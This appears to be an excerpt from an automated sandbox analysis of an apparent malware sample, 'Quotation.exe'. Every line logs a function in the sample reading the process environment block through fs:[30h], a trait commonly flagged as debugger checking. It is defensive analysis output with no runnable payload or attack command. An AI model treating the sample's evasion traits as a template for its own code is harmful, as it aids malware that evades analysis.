      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54260 mov eax, dword ptr fs:[00000030h]3_2_33E54260
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54260 mov eax, dword ptr fs:[00000030h]3_2_33E54260
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4826B mov eax, dword ptr fs:[00000030h]3_2_33E4826B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E79274 mov eax, dword ptr fs:[00000030h]3_2_33E79274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E91270 mov eax, dword ptr fs:[00000030h]3_2_33E91270
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E91270 mov eax, dword ptr fs:[00000030h]3_2_33E91270
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1D26B mov eax, dword ptr fs:[00000030h]3_2_33F1D26B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1D26B mov eax, dword ptr fs:[00000030h]3_2_33F1D26B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49240 mov eax, dword ptr fs:[00000030h]3_2_33E49240
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49240 mov eax, dword ptr fs:[00000030h]3_2_33E49240
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8724D mov eax, dword ptr fs:[00000030h]3_2_33E8724D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0B256 mov eax, dword ptr fs:[00000030h]3_2_33F0B256
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0B256 mov eax, dword ptr fs:[00000030h]3_2_33F0B256
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED8243 mov eax, dword ptr fs:[00000030h]3_2_33ED8243
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED8243 mov ecx, dword ptr fs:[00000030h]3_2_33ED8243
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A250 mov eax, dword ptr fs:[00000030h]3_2_33E4A250
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E56259 mov eax, dword ptr fs:[00000030h]3_2_33E56259
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25227 mov eax, dword ptr fs:[00000030h]3_2_33F25227
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4823B mov eax, dword ptr fs:[00000030h]3_2_33E4823B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E87208 mov eax, dword ptr fs:[00000030h]3_2_33E87208
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E87208 mov eax, dword ptr fs:[00000030h]3_2_33E87208
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E551ED mov eax, dword ptr fs:[00000030h]3_2_33E551ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E801F8 mov eax, dword ptr fs:[00000030h]3_2_33E801F8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EF71F9 mov esi, dword ptr fs:[00000030h]3_2_33EF71F9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F261E5 mov eax, dword ptr fs:[00000030h]3_2_33F261E5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F161C3 mov eax, dword ptr fs:[00000030h]3_2_33F161C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F161C3 mov eax, dword ptr fs:[00000030h]3_2_33F161C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8D1D0 mov eax, dword ptr fs:[00000030h]3_2_33E8D1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8D1D0 mov ecx, dword ptr fs:[00000030h]3_2_33E8D1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F251CB mov eax, dword ptr fs:[00000030h]3_2_33F251CB
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov ecx, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6B1B0 mov eax, dword ptr fs:[00000030h]3_2_33E6B1B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E90185 mov eax, dword ptr fs:[00000030h]3_2_33E90185
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A197 mov eax, dword ptr fs:[00000030h]3_2_33E4A197
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A197 mov eax, dword ptr fs:[00000030h]3_2_33E4A197
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A197 mov eax, dword ptr fs:[00000030h]3_2_33E4A197
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0C188 mov eax, dword ptr fs:[00000030h]3_2_33F0C188
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0C188 mov eax, dword ptr fs:[00000030h]3_2_33F0C188
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA7190 mov eax, dword ptr fs:[00000030h]3_2_33EA7190
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE9179 mov eax, dword ptr fs:[00000030h]3_2_33EE9179
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25152 mov eax, dword ptr fs:[00000030h]3_2_33F25152
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE4144 mov eax, dword ptr fs:[00000030h]3_2_33EE4144
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE4144 mov eax, dword ptr fs:[00000030h]3_2_33EE4144
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE4144 mov ecx, dword ptr fs:[00000030h]3_2_33EE4144
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE4144 mov eax, dword ptr fs:[00000030h]3_2_33EE4144
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE4144 mov eax, dword ptr fs:[00000030h]3_2_33EE4144
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49148 mov eax, dword ptr fs:[00000030h]3_2_33E49148
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49148 mov eax, dword ptr fs:[00000030h]3_2_33E49148
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49148 mov eax, dword ptr fs:[00000030h]3_2_33E49148
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49148 mov eax, dword ptr fs:[00000030h]3_2_33E49148
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E56154 mov eax, dword ptr fs:[00000030h]3_2_33E56154
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E56154 mov eax, dword ptr fs:[00000030h]3_2_33E56154
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4C156 mov eax, dword ptr fs:[00000030h]3_2_33E4C156
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE8158 mov eax, dword ptr fs:[00000030h]3_2_33EE8158
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57152 mov eax, dword ptr fs:[00000030h]3_2_33E57152
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E80124 mov eax, dword ptr fs:[00000030h]3_2_33E80124
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B136 mov eax, dword ptr fs:[00000030h]3_2_33E4B136
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B136 mov eax, dword ptr fs:[00000030h]3_2_33E4B136
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B136 mov eax, dword ptr fs:[00000030h]3_2_33E4B136
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B136 mov eax, dword ptr fs:[00000030h]3_2_33E4B136
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E51131 mov eax, dword ptr fs:[00000030h]3_2_33E51131
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E51131 mov eax, dword ptr fs:[00000030h]3_2_33E51131
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F10115 mov eax, dword ptr fs:[00000030h]3_2_33F10115
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFA118 mov ecx, dword ptr fs:[00000030h]3_2_33EFA118
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFA118 mov eax, dword ptr fs:[00000030h]3_2_33EFA118
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFA118 mov eax, dword ptr fs:[00000030h]3_2_33EFA118
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFA118 mov eax, dword ptr fs:[00000030h]3_2_33EFA118
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E750E4 mov eax, dword ptr fs:[00000030h]3_2_33E750E4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E750E4 mov ecx, dword ptr fs:[00000030h]3_2_33E750E4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A0E3 mov ecx, dword ptr fs:[00000030h]3_2_33E4A0E3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E580E9 mov eax, dword ptr fs:[00000030h]3_2_33E580E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED60E0 mov eax, dword ptr fs:[00000030h]3_2_33ED60E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4C0F0 mov eax, dword ptr fs:[00000030h]3_2_33E4C0F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E920F0 mov ecx, dword ptr fs:[00000030h]3_2_33E920F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov ecx, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov ecx, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov ecx, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov ecx, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]3_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F250D9 mov eax, dword ptr fs:[00000030h]3_2_33F250D9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD0C0 mov eax, dword ptr fs:[00000030h]3_2_33ECD0C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD0C0 mov eax, dword ptr fs:[00000030h]3_2_33ECD0C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED20DE mov eax, dword ptr fs:[00000030h]3_2_33ED20DE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E790DB mov eax, dword ptr fs:[00000030h]3_2_33E790DB
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE80A8 mov eax, dword ptr fs:[00000030h]3_2_33EE80A8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F160B8 mov eax, dword ptr fs:[00000030h]3_2_33F160B8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F160B8 mov ecx, dword ptr fs:[00000030h]3_2_33F160B8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D08D mov eax, dword ptr fs:[00000030h]3_2_33E4D08D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5208A mov eax, dword ptr fs:[00000030h]3_2_33E5208A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E55096 mov eax, dword ptr fs:[00000030h]3_2_33E55096
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8909C mov eax, dword ptr fs:[00000030h]3_2_33E8909C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7D090 mov eax, dword ptr fs:[00000030h]3_2_33E7D090
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7D090 mov eax, dword ptr fs:[00000030h]3_2_33E7D090
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED106E mov eax, dword ptr fs:[00000030h]3_2_33ED106E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25060 mov eax, dword ptr fs:[00000030h]3_2_33F25060
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7C073 mov eax, dword ptr fs:[00000030h]3_2_33E7C073
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov ecx, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]3_2_33E61070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD070 mov ecx, dword ptr fs:[00000030h]3_2_33ECD070
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EF705E mov ebx, dword ptr fs:[00000030h]3_2_33EF705E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EF705E mov eax, dword ptr fs:[00000030h]3_2_33EF705E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E52050 mov eax, dword ptr fs:[00000030h]3_2_33E52050
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B052 mov eax, dword ptr fs:[00000030h]3_2_33E7B052
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED6050 mov eax, dword ptr fs:[00000030h]3_2_33ED6050
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A020 mov eax, dword ptr fs:[00000030h]3_2_33E4A020
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4C020 mov eax, dword ptr fs:[00000030h]3_2_33E4C020
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1903E mov eax, dword ptr fs:[00000030h]3_2_33F1903E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1903E mov eax, dword ptr fs:[00000030h]3_2_33F1903E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1903E mov eax, dword ptr fs:[00000030h]3_2_33F1903E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1903E mov eax, dword ptr fs:[00000030h]3_2_33F1903E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED4000 mov ecx, dword ptr fs:[00000030h]3_2_33ED4000
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E016 mov eax, dword ptr fs:[00000030h]3_2_33E6E016
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E016 mov eax, dword ptr fs:[00000030h]3_2_33E6E016
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E016 mov eax, dword ptr fs:[00000030h]3_2_33E6E016
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E016 mov eax, dword ptr fs:[00000030h]3_2_33E6E016
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5D7E0 mov ecx, dword ptr fs:[00000030h]3_2_33E5D7E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E727ED mov eax, dword ptr fs:[00000030h]3_2_33E727ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E727ED mov eax, dword ptr fs:[00000030h]3_2_33E727ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E727ED mov eax, dword ptr fs:[00000030h]3_2_33E727ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E547FB mov eax, dword ptr fs:[00000030h]3_2_33E547FB
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E547FB mov eax, dword ptr fs:[00000030h]3_2_33E547FB
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5C7C0 mov eax, dword ptr fs:[00000030h]3_2_33E5C7C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E557C0 mov eax, dword ptr fs:[00000030h]3_2_33E557C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E557C0 mov eax, dword ptr fs:[00000030h]3_2_33E557C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E557C0 mov eax, dword ptr fs:[00000030h]3_2_33E557C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED07C3 mov eax, dword ptr fs:[00000030h]3_2_33ED07C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EDF7AF mov eax, dword ptr fs:[00000030h]3_2_33EDF7AF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EDF7AF mov eax, dword ptr fs:[00000030h]3_2_33EDF7AF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EDF7AF mov eax, dword ptr fs:[00000030h]3_2_33EDF7AF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EDF7AF mov eax, dword ptr fs:[00000030h]3_2_33EDF7AF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EDF7AF mov eax, dword ptr fs:[00000030h]3_2_33EDF7AF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F237B6 mov eax, dword ptr fs:[00000030h]3_2_33F237B6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED97A9 mov eax, dword ptr fs:[00000030h]3_2_33ED97A9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E507AF mov eax, dword ptr fs:[00000030h]3_2_33E507AF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7D7B0 mov eax, dword ptr fs:[00000030h]3_2_33E7D7B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]3_2_33E4F7BA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F78A mov eax, dword ptr fs:[00000030h]3_2_33F0F78A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B765 mov eax, dword ptr fs:[00000030h]3_2_33E4B765
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B765 mov eax, dword ptr fs:[00000030h]3_2_33E4B765
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B765 mov eax, dword ptr fs:[00000030h]3_2_33E4B765
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B765 mov eax, dword ptr fs:[00000030h]3_2_33E4B765
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E58770 mov eax, dword ptr fs:[00000030h]3_2_33E58770
